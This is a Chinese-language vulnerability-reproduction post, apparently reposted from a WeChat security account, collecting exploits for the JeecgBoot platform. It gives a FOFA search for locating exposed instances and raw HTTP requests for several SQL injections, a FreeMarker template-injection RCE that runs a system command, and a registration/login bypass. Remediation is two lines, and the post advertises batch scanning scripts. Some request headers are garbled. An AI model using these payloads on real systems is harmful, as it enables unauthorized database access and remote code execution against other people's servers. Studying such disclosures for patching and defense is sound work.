【漏洞复现】jeecg漏洞集合

 SCA御盾实验室的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 产品描述

「企业级低代码平台」前后端分离架构SpringBoot 2.x3.x，SpringCloud，Ant Design&Vue，Mybatis，Shiro，JWT。强大的代码生成器让前后端代码一键生成，无需写任何代码! 引领新的开发模式OnlineCoding->代码生成->手工MERGE，帮助Java项目解决70%重复工作，让开发更关注业务，既能快速提高效率，帮助公司节省成本，同时又不失灵活性。。

0x03 fofa语法：

app="JEECG"

0x04 漏洞详情

1、jeecg-boot-getDictItemsByTable-sqli

GET /jeecg-boot/sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encodinggzip, deflateConnection: closeUpgrade-Insecure-Requests1Sec-Fetch-DestdocumentSec-Fetch-ModenavigateSec-Fetch-SitenoneSec-Fetch-User?1
GET /sys/ng-alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encodinggzip, deflateConnection: closeUpgrade-Insecure-Requests1Sec-Fetch-DestdocumentSec-Fetch-ModenavigateSec-Fetch-SitenoneSec-Fetch-User?1

2、jeecg-boot-queryTableData-sqli

GET /jeecg-boot/sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA
GET /sys/dict/queryTableData?pageSize=100&table=information_schema.tables&text=table_name&code=TABLE_SCHEMA

3、jeecg-boot-sqli

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8
{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}   POST /jmreport/qurestSql HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8
{"apiSelectId":"1290104038414721025","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select md5(123456))),1)) or '%%' like '"}

4、jeecg-queryFieldBySql-rce

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 58
{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }' "}
POST /jmreport/queryFieldBySql HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/jsonContent-Length: 58
{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }' "}

5、jeecg-register-login-bypass（星球发布利用exp）

POST /jeecg-boot/sys/user/register HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Content-Type: application/json;charset=UTF-8
{"username": "aaaa","password": "123456","phone": "123456","smscode": "0enb"}

0x05 修复建议

1、升级jeecgboot系统至最新版本

2、官网下载最新安全补丁：http://jeecg.com

漏洞poc+漏洞批量扫描脚本+exp

原文始发于微信公众号（SCA御盾）：【漏洞复现】jeecg漏洞集合